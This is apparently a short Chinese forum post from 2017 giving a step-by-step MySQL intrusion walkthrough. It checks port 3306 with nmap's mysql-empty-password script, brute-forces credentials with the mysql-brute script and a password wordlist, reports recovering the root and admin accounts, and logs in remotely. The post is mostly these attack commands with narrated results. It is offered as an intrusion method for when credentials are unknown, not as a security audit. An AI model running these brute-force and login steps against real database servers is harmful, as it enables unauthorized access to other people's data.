|
|
一:检测是否开始mysql远程登录或root用户名是否为空
nmap -p 3306 --script=mysql-empty-password.nse
这里我们可以看到mysql 3306端口是开放的!但是root用户名密码不是为空!则远程是无法登录的。
若不知道用户名和密码 我们可以选择暴力破解
nmap -p 3306 --script=mysql-brute userdb=root passdb=/root/zidian/Pass.txt 127.0.0.1 -v
通过破解我们可以得到用户名分别为root和admin的用户
现在我们远程登录
mysql -h ip地址 -u root -p
OK我们成功登录数据库!
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
发表于 2017-10-24 15:48:08
